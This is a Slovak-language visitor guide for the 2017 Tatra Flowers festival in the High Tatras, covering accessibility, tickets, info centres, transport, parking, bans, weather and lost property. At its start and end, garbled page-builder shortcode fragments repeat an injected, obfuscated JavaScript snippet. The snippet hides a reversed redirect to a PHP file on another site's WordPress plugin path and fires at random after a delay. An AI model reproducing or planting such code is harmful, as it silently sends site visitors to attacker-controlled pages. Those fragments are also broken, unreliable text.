) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top=“20px“ padding_bottom=“20px“]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top“ background_repeat=“no-repeat“ border_size=“0″ border_color=““ border_style=“solid“ border_position=“all“ padding=““ dimension_margin=““ animation_type=““ animation_direction=“left“ animation_speed=“0.3″ animation_offset=““ last=“no“ element_content=““]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top“ background_repeat=“no-repeat“ border_size=“0″ border_color=““ border_style=“solid“ border_position=“all“ padding=““ dimension_margin=““ animation_type=““ animation_direction=“left“ animation_speed=“0.3″ animation_offset=““ last=“no“]

FESTIVAL GUIDE A INFORMÁCIE

Bezbariérový prístup

Celý areál festivalu v lokalite Štrbské Pleso – Mostíky je bezbariérový. Pre ZŤP je vyhradená plocha pred pódiom v sektore 1.
Medzi ďalšie lokality, ktoré sú prístupné aj pre ZŤP, patrí park v Tatranskej Lomnici, filmové pódium na Štrbskom Plese, Hrebienok, Popradské pleso a sála Hoepfner v Grandhoteli v Starom Smokovci.

Bezpečnosť

O bezpečnosť návštevníkov v lokalite Štrbské Pleso – Mostíky sa bude starať bezpečnostná a usporiadateľská služba. Ďakujeme, že budete dodržiavať ich pokyny.
V prípade, že ste svedkom alebo účastníkom situácie, kedy je ohrozená bezpečnosť kohokoľvek z účastníkov festivalu, ihneď sa obráťte na bezpečnostnú službu.

Oblečenie

Festival Tatra Flowers sa koná vo vysokohorskom prostredí s premenlivým počasím. Prispôsobte tomu, prosím, svoju obuv aj odev. Odporúčame zvoliť trekingovú obuv, viacero vrstiev oblečenia, pribaliť pršiplášť či nepremokavú bundu.
Pred úpalom a vysokohorským slnkom sa chráňte opaľovacím krémom s vysokým ochranným faktorom a pokrývkou hlavy.

Strava/občerstvenie

Všetky pódia festivalu Tatra Flowers sú na miestach, kde sú bežne dostupné gastro zariadenia, chaty, stanice lanoviek, stánky atď.
V areáli mostíkov na Štrbskom Plese bude zabezpečené občerstvenie priamo vnútri areálu. Napriek tomu, že v každej festivalovej lokalite bude možné zakúpiť si občerstvenie a nápoje, odporúčame zabezpečiť si na prípadnú túru vlastné zásoby a nezabúdať na dostatočný príjem tekutín.

Deti

Zľavy na detské vstupenky na sobotňajšie koncerty Jany Kirschner a SĽUK v lokalite Štrbské Pleso – Mostíky si môžete uplatniť na predajných miestach siete Ticketportal takto:

– Deti do 2 rokov majú zadarmo vstup do všetkých sektorov, sedia na kolenách rodičov

– Deti do 100 cm zľava 50 % z ceny vstupenky do všetkých sektorov

– Deti nad 100 cm platia plnú cenu vstupenky do všetkých sektorov

Ďalšie festivalové lokality, konkrétne kostol a park v Tatranskej Lomnici, Popradské pleso, filmové pódium na Štrbskom Plese, Skalnaté pleso, Hrebienok, Grandhotel Starý Smokovec a Téryho chata sú pre všetkých zadarmo počas všetkých festivalových dní.

Rodičov prosíme, aby dbali na bezpečnosť svojich detí na vysokohorských túrach aj v miestach konania koncertov.

Infolinka

+421 902 551 084  |  +421 902 551 087  |  +421 902 551 088

Pre festivalových návštevníkov bude od štvrtka 31. 8. 2017 do nedele 3. 9. 2017 v čase 10:00 – 18:00 dostupná bezplatná infolinka.
Infolinka bude poskytovať všetky informácie týkajúce sa festivalu a jeho programu. Obrátiť sa na ňu môžete aj s otázkami o počasí, doprave, stratách a nálezoch, či s požiadavkami o pomoc na festivalových lokalitách.

Horská služba

V prípade potreby pomoci môžete kedykoľvek kontaktovať Horskú službu na ich nonstop čísle 18 300.

Infocentrum

Počas festivalu sú zriadené 3 infocentrá, ktoré sú návštevníkom k dispozícii od štvrtka 31. 8. 2017 do nedele 3. 9. 2017 v čase 10:00 – 18:00.

– Štrbské Pleso – Mostíky, drevené pódium oproti hotelu FIS – Námestie MS 1970
– TIK Starý Smokovec – Budova Horskej záchrannej služby, Starý Smokovec č. 23, tel. č. +421 (0) 52 442 34 40
– TIK Tatranská Lomnica – Tatranská Lomnica č. 98, tel. č. +421 (0) 52 446 81 19

V infocentrách si môžete zakúpiť lístky na sobotňajšie vystúpenia SĽUKu a Jany Kirschner na Štrbskom Plese – Mostíkoch.
Môžete tu získať viac informácií o festivalovom programe, doprave a parkovaní vo Vysokých Tatrách či počasí v jednotlivých festivalových lokalitách. Taktiež si v nich môžete zakúpiť festivalové tričká, herbár alebo ďalšie spomienkové predmety.
V oboch TIK (Tatranská informačná kancelária) je tiež možné zakúpiť si zdravotné poistenie do hôr.

Drogy

Drogy sú na festivale zakázané. Ich predaj a konzumácia sú protizákonné. Situáciu bude priamo na mieste monitorovať polícia.

Fajčenie

Fajčenie je zakázané na všetkých miestach konania festivalu v priestorch koncertov. Na všetkých miestach, kde sa nachádzajú gastro zariadenia, sú aj miesta určené pre fajčiarov. Prosím rešpektujte miesto, na ktorom sa nachádzame a využívajte iba tieto miesta, kde nájdete aj popolníky. Ďakujeme.

Foto/video

Fotografovanie a natáčanie koncertov profesionálnymi fotoaparátmi a kamerami je zakázané. Povolené sú mobilné telefóny a neprofesionálne fotoaparáty. Kvôli ochrane prírody a zveri je prísne zakázané používať blesk.

Každý návštevník svojou účasťou vyjadruje súhlas s neobmedzeným uverejňovaním akýchkoľvek festivalových fotografií či videozáznamov, na ktorých sa nachádza. Použité môžu byť len na marketingové účely festivalu Tatra Flowers a jeho partnerov.

Hygiena

V lokalite Štrbské Pleso – Mostíky sú pre návštevníkov okrem verejných toaliet k dispozícii aj mobilné WC. Mobilné WC nájdete tiež v parku v Tatranskej Lomnici.

V ďalších festivalových lokalitách prosíme návštevníkov, aby využívali verejné toalety nachádzajúce sa v danej lokalite.

Kemping

Organizátori festivalu nie sú prevádzkovateľmi žiadneho miesta na kemping, stanovanie. V žiadnej festivalovej lokalite nie je možné stanovať či zakladať otvorený oheň. Odporúčame využiť kemp v Tatranskej Lomnici či Tatranskej Štrbe, ktorých využitie sa riadi pravidlami a cenníkmi daných zariadení.

Doprava

Tatranské vlaky – električka, zubačka:

Poprad-Tatry – Starý Smokovec – Štrbské Pleso a späť

Starý Smokovec – Tatranská Lomnica a späť

Štrba – Štrbské Pleso a späť

Cestovný poriadok autobusov

Lanovky

Parkovanie

Festivaloví návštevníci, ktorí prídu autom, môžu využívať štandardné, označené parkovacie miesta v celých Vysokých Tatrách.
Organizátori festivalu nie sú prevádzkovateľmi existujúcich parkovísk a ich využitie sa riadi pravidlami a cenníkmi, na ktoré organizátori nemajú dosah. Viac informácii o cenách a lokalitách parkovísk nájdete aj na stránke TIK.

Ak sa v sobotu 2. septembra chystáte na Štrbské Pleso zažiť vystúpenia SĽUKu a Jany Kirshner, skúste to bez auta, jednoducho a príjemne :o)

Zaparkujte svoje auto kdekoľvek nižšie a užite si Tatry bez stresu s dopravou električkou smerom od Popradu, alebo od Tatranskej Lomnice, alebo zubačkou z Tatranskej Štrby.
Všetky cestovné poriadky nájdete tu: DOPRAVA

V sobotu 2. septembra bude vytvorené bezplatné záchytné parkovisko v obci Tatranská Štrba, z ktorej sa jednoducho dopravíte na lokalitu Štrbské Pleso – Mostíky zubačkou TEŽ.

Návštevníkov prosíme o spoluprácu a dodržiavanie pokynov organizátorov a polície, ktorí budú usmerňovať dopravu vo festivalových lokalitách, aj na špeciálne pre tento deň vybudované parkovisko v Tatranskej Štrbe.

Zoznam a kapacita parkovacích plôch pre návštevníkov v lokalite Štrbské Pleso – Mostíky:
Parkovisko Bežecké trate – 300 miest
Parkovisko pri Patrii – 28 miest
Parkovisko pri ŠKP – 28 miest
Centrálne parkovisko – 294 miest
Parkovisko autobusová stanica – 61 miest + 11 autobusov
Parkovisko Ovruč – 100 miest
Parkovisko – cesta na Popradské pleso – 100 miest
Parkovisko pri Malom jazere – 60 miest
Parkovisko pri penzióne Pleso – 43 miest

Spolu približne 1014 parkovacích miest pre osobné vozidlá a 11 parkovacích miest pre autobusy

Pekné vecičky Tatra Flowers

V spolupráci s e-shopom Kompot sme pre vás pripravili sériu festivalových vecičiek, ktoré sú k dispozícii online, aj na mieste počas konania festivalu vo všetkých troch festivalových infocentrách.

Návratky

Počas sobotňajšieho koncertu Jany Kirschner a SĽUK v lokalite Štrbské Pleso – Mostíky bude vstup aj výstup z areálu kontrolovaný pomocou turniketov a bezpečnostnej služby.

Pre opätovný návrat do areálu je nutné mať pri sebe festivalovú vstupenku, ktorá bude po odtrhnutí kontrolného ústrižku fungovať ako návratka. Bez platnej vstupenky nie je návrat do areálu možný.

Vstupenky

Jediným spoplatneným podujatím festivalu Tatra Flowers je sobotňajší koncert Jany Kirschner a vystúpenie SĽUKu na Štrbskom Plese – areál mostíkov. Vstupenky na tento koncert zakúpite v sieti Ticketportal.

Všetky ostatné lokality a ich program sú pre návštevníkov počas celého konania festivalu Tatra Flowers bezplatné. Na koncerty Michala Matejčíka si kvôli obmedzenej kapacite miest treba vyzdvihnúť voľné vstupenky v infocentre na Štrbskom Plese od štvrtka do nedele, jeden človek môže dostať max. 2 lístky.

Odpad

Prosíme všetkých návštevníkov festivalu Tatra Flowers, aby dbali na čistotu festivalových lokalít a rešpektovali návštevný poriadok TANAPu.

Návštevníkov preto žiadame, aby v prírode nezahadzovali akékoľvek odpadky, ale zobrali ich so sebou a vyhodili ich do smetných košov.
V lokalite Štrbské Pleso – Mostíky budú pre návštevníkov pripravené odpadkové koše a veľkokapacitné kontajnery.
Na ostatných lokalitách sú možnosti zahodiť odpadky do existujúcich košov a kontajnerov.

Počasie

Všetkým návštevníkom odporúčame pozorne sledovať počasie na webstránke SHMÚ počas celého trvania festivalu. Aj keď koncom leta už býva stabilnejšie, vysokohorské počasie sa dokáže zmeniť v priebehu minút, preto je potrebné dbať na vhodné oblečenie a obuv.

Ak vás vonku zastihne búrka, mobil používajte iba v najnutnejších prípadoch. Čo najskôr nájdite najbližšiu možnú chatu a búrku tam prečkajte.
Odporúčame, aby ste si so sebou na túry brali radšej pršiplášte a nepremokavé bundy, nie dáždniky.

Informácie o počasí pre návštevníkov festivalu poskytuje aj festivalová infolinka a infocentrá.

Psy

Na území národného parku môžu návštevníci vodiť psy len s ochranným košom a vodiacim remeňom. V chránených územiach so štvrtým a piatym stupňom ochrany platí zákaz voľného púšťania, vodenia a nosenia psov. Voľný pohyb psov je zakázaný.

Majiteľom domácich miláčikov odporúčame, aby dbali na ich zdravie a pohodlie.

Straty a nálezy

Všetky straty môžete hlásiť a nálezy odovzdať vo festivalových infocentrách. Nevyzdvihnuté nálezy budú po ukončení festivalu zdokumentované a zverejnené na našej facebookovej stránke.

Zákazy

Na všetky festivalové lokality je prísne zakázané vnášať akékoľvek sklenené nádoby a fľaše, zbrane akéhokoľvek druhu, pyrotechnický materiál, horľaviny či dáždniky, drogy a akékoľvek predmety ohrozujúce bezpečnosť. Nesmie sa zakladať otvorený oheň ani používať kempingové variče.

Pre všetky festivalové lokality platí tiež oficiálny návštevný poriadok TANAP, ktorý usmerňuje pohyb a správanie návštevníkov.

Upratovanie

O čistotu festivalových lokalít sa pred, počas aj po ukončení festivalu Tatra Flowers starajú dobrovoľníci z Tatranského okrášľovacieho spolku. Aj napriek tomu prosíme návštevníkov, aby dbali na čistotu festivalových lokalít a rešpektovali pravidlá TANAP a lokalít, na ktorých sa budú nachádzať.

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top“ background_repeat=“no-repeat“ border_size=“0″ border_color=““ border_style=“solid“ border_position=“all“ padding=““ dimension_margin=““ animation_type=““ animation_direction=“left“ animation_speed=“0.3″ animation_offset=““ last=“no“ element_content=““]